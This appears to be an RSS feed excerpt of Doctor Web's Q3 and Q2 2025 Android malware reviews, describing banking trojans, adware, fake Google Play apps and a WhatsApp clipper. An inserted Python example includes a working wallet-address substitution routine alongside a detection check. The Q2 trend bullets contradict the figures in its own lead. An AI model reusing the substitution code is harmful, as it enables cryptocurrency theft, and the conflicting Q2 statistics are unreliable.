    &lt;p&gt;Despite a 38.88% decline in activity, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojans remain the most widespread banking malware. Threat actors use them to gain illegal access to banking accounts and steal money. These trojans can display phishing windows to hijack logins and passwords, imitate the appearance of real banking software, intercept SMS to obtain one-time codes, etc.&lt;/p&gt;
    &lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojans were followed by the &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; trojans, which were detected 18.91% more often than in Q2. Such trojans also try to gain access to users’ online banking accounts by intercepting confirmation codes. At the same time, these malicious apps can execute various commands coming from cybercriminals. Some of them also allow infected devices to be controlled remotely.&lt;/p&gt;
    &lt;p&gt;Rounding out the top three, &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojans were detected 17.25% less often than in the previous quarter. These malicious apps are based on the source code of the spyware trojan SpyNote and provide a wide range of functions, including the ability to remotely control affected devices.&lt;/p&gt;
    &lt;p&gt;In August, we &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15047" target="_blank"&gt;informed&lt;/a&gt; users about a malware distribution campaign involving the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; multi-functional backdoor. Cybercriminals use this piece of malware to steal confidential data and spy on Android device users. Threat actors sent messages to potential victims via various messengers, offering an “anti-virus” that can be installed from the attached APK file. Doctor Web’s anti-virus laboratory discovered the first versions of this backdoor back in January 2025 and has continued to monitor its development ever since. Our experts believe that this backdoor is used in targeted attacks and is not intended for mass distribution. The main target for cybercriminals is representatives of Russian businesses.&lt;/p&gt;
    &lt;p&gt;Over the course of Q3, a large number of malicious programs were distributed on Google Play for a combined total of over 1,459,000 installations. Among them were dozens of &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans that subscribe victims to paid services and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs. In addition, our malware analysts discovered yet another app that supposedly allowed virtual rewards to be converted into real money.&lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends of Q3 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans became the most widespread threats&lt;/li&gt;
            &lt;li&gt;The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans continued to decline&lt;/li&gt;
            &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojan attacks increased&lt;/li&gt;
            &lt;li&gt;Banking trojans &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; were less active&lt;/li&gt;
            &lt;li&gt;Cybercriminals used a multi-functional backdoor, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, to attack representatives of Russian businesses&lt;/li&gt;
            &lt;li&gt;Many malicious apps were found on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.1.png" alt="Malware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for malicious &lt;i&gt;WhatsApp&lt;/i&gt; messenger mods that can covertly load various websites in the background.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a packer for &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with malicious Telegram messenger mods in which these trojans are embedded.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.1.png" alt="Unwanted_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.1.png" alt="Riskware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change how they work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to a shared database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.1.png" alt="Adware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the &lt;i&gt;WhatsApp&lt;/i&gt; messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Youmi&amp;lng=en"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for an unwanted adware module that adds advertising shortcuts onto the Android OS home screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Threats on Google Play&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, Doctor Web's anti-virus laboratory detected over 50 trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; family which subscribe users to paid services. They were distributed under the guise of different software, including messengers, various system tools, image-editing apps, camera apps, programs for working with documents, etc.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;One trojan was hidden in the system-optimizing app Clean Boost (&lt;b&gt;Android.Joker.2412&lt;/b&gt;), and another — in the app Convert Text to PDF (&lt;b&gt;Android.Joker.2422&lt;/b&gt;) for creating PDF documents&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;Moreover, our specialists discovered more fake apps from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family being used in fraudulent schemes. As before, cybercriminals passed some of them off as financial apps, such as reference books, teaching aids, and software for accessing investment services. Other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans were distributed as games and, under certain conditions, loaded bookmaker and online casino websites instead of operating as promised.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;Examples of &lt;b&gt;Android.FakeApp&lt;/b&gt; trojans disguised as financial apps. &lt;b&gt;Android.FakeApp.1889&lt;/b&gt; offered users the chance to test their financial literacy and &lt;b&gt;Android.FakeApp.1890&lt;/b&gt; the opportunity to develop financial intellection&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;Our experts also discovered &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;—an unwanted app, distributed as software called &lt;i&gt;Zeus Jackpot Mania&lt;/i&gt;. In this program, users could get virtual rewards that they could supposedly convert into real money and withdraw it.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; on Google Play&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;To “withdraw” the money, victims had to hand over personal data to the app. In the end, they received no payments at all.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; asks users to provide their full name and information about their bank account&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;
    &lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15027&amp;lng=en</guid><title>Doctor Web’s Q2 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15027&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Jul 2025 06:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;July 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, adware trojans from various families remained the most common malware. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojan family were again the most active, despite the fact that users encountered them 8.62% less often. These were followed by &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans; the number of attacks involving them increased by 11.17%. &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious programs, used in various fraudulent schemes, ranked third; they were detected on protected devices 25.17% less frequently.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans increased by 73.15%, compared to the previous quarter. 
        At the same time, some other banking trojan families were detected less often, e.g., &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; (by 37.19%) and &lt;b&gt;Android.SpyMax&lt;/b&gt; (by 19.14%).
    &lt;/p&gt;
    &lt;p&gt;
        In April, our virus analysts &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; 
        the public about the discovery of a large-scale campaign to steal cryptocurrency from Android smartphone users. 
        During this campaign, malicious actors hid &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; in a modified version of the WhatsApp 
        messenger and implanted it into the firmware of some budget Android smartphone models. This trojan intercepts messages 
        sent and received in the messenger, searches them for Tron and Ethereum crypto wallet addresses, and replaces 
        legitimate addresses with ones belonging to the scammers. At the same time, the trojan conceals this substitution, 
        so users of infected devices see the “correct” wallets in their messages. Moreover, &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; 
        sends all images in the &lt;i&gt;jpg&lt;/i&gt;, &lt;i&gt;png&lt;/i&gt;, and &lt;i&gt;jpeg&lt;/i&gt; formats to a remote server, where they are searched for the mnemonic (seed) phrases 
        of the victims’ crypto wallets.
    &lt;/p&gt;
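    &lt;p&gt;The address-swapping technique described above, as an added Python example that is not part of Doctor Web’s report or of the trojan’s code: it extracts Tron and Ethereum addresses from a message body (validating Tron addresses by their base58check checksum so that random base58-looking strings are ignored), applies a clipper-style substitution to show what the malware does to a message, and then runs the check a defender can make, comparing the addresses the messenger displays with those actually transmitted. The sample message, the 20-byte address hashes and all function names are constructed for this example.&lt;/p&gt;

```python
import hashlib
import re

# Base58 alphabet used by Tron (same as Bitcoin): no 0, O, I or l.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Tron mainnet addresses are base58check of 0x41 || 20-byte hash: 34 chars starting with 'T'.
# Ethereum addresses are 0x followed by 40 hex digits.
TRON_RE = re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b")
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
TRON_PREFIX = b"\x41"


def b58encode(raw: bytes) -> str:
    n = int.from_bytes(raw, "big")
    digits = []
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    leading = len(raw) - len(raw.lstrip(b"\x00"))  # leading zero bytes become '1'
    return "1" * leading + "".join(reversed(digits))


def b58decode(text: str) -> bytes:
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-alphabet character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading + body


def tron_address_from_hash(addr_hash20: bytes) -> str:
    """base58check(0x41 || hash); checksum = first 4 bytes of sha256(sha256(payload))."""
    payload = TRON_PREFIX + addr_hash20
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return b58encode(payload + checksum)


def tron_checksum_ok(addr: str) -> bool:
    """True only for a well-formed mainnet address whose checksum verifies."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0:1] != TRON_PREFIX:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def find_wallet_addresses(text: str) -> list[tuple[str, str]]:
    """(chain, address) pairs in order of appearance; Tron hits must pass base58check."""
    hits = []
    for m in TRON_RE.finditer(text):
        if tron_checksum_ok(m.group(0)):
            hits.append((m.start(), "tron", m.group(0)))
    for m in ETH_RE.finditer(text):
        hits.append((m.start(), "ethereum", m.group(0)))
    return [(chain, addr) for _, chain, addr in sorted(hits)]


def clipper_substitute(text: str, attacker_tron: str, attacker_eth: str) -> str:
    """The core of a clipper: rewrite every wallet address in a message with the attacker's."""
    return ETH_RE.sub(attacker_eth, TRON_RE.sub(attacker_tron, text))


def addresses_tampered(displayed: str, transmitted: str) -> bool:
    """Detection check: what the UI shows must carry the same addresses as what went over the wire."""
    return find_wallet_addresses(displayed) != find_wallet_addresses(transmitted)


if __name__ == "__main__":
    # Constructed sample: a victim address, an attacker address and one message body.
    victim = tron_address_from_hash(bytes(range(20)))
    attacker = tron_address_from_hash(bytes([0xAA]) * 20)
    message = f"send the deposit to {victim} or 0x{'ab' * 20} thanks"
    on_the_wire = clipper_substitute(message, attacker, "0x" + "cd" * 20)
    print("displayed :", find_wallet_addresses(message))
    print("transmitted:", find_wallet_addresses(on_the_wire))
    print("tampered  :", addresses_tampered(message, on_the_wire))
```

    &lt;p&gt;The check in &lt;i&gt;addresses_tampered&lt;/i&gt; only works if the “transmitted” text comes from a source the trojan cannot rewrite, such as a packet capture or the recipient’s copy of the message; the whole point of the concealment described above is that the infected device’s own screen cannot be trusted.&lt;/p&gt;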
    &lt;p&gt;
        Also in April, we &lt;a href="https://news.drweb.com/show/?i=15006&amp;lng=en" target="_blank"&gt;reported&lt;/a&gt; on a spyware trojan targeting Russian military personnel. 
        The &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; malicious program was hidden in a modified version of the Alpine Quest mapping software. It was distributed via a fake Telegram 
        channel for the app, created by the threat actors, as well as via one of the Russian Android app catalogs. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; sent various confidential data to the attackers, including the user’s accounts and mobile phone number, contacts from the phone book, 
        the infected device’s geolocation, and a list of the files stored in its memory. When commanded by the malicious actors, the trojan could exfiltrate specified files. 
        The malware creators were particularly interested in confidential documents sent via popular messengers as well as in Alpine Quest’s location log file.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, during this most recent observation period, Doctor Web’s virus laboratory detected more threats on Google Play. 
        Among them were various trojans and unwanted ad-displaying software.
    &lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends of Q2 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans intensified their activity&lt;/li&gt;
            &lt;li&gt;Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family also heightened their activity&lt;/li&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were less commonly detected on protected devices, compared to the previous quarter&lt;/li&gt;
            &lt;li&gt;Decreased numbers of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan family attacks were noted&lt;/li&gt;
            &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of several budget Android smartphone models&lt;/li&gt;
            &lt;li&gt;Malicious actors distributed a trojan that spied on Russian military personnel&lt;/li&gt;
            &lt;li&gt;More threats emerged on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" alt="Malware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
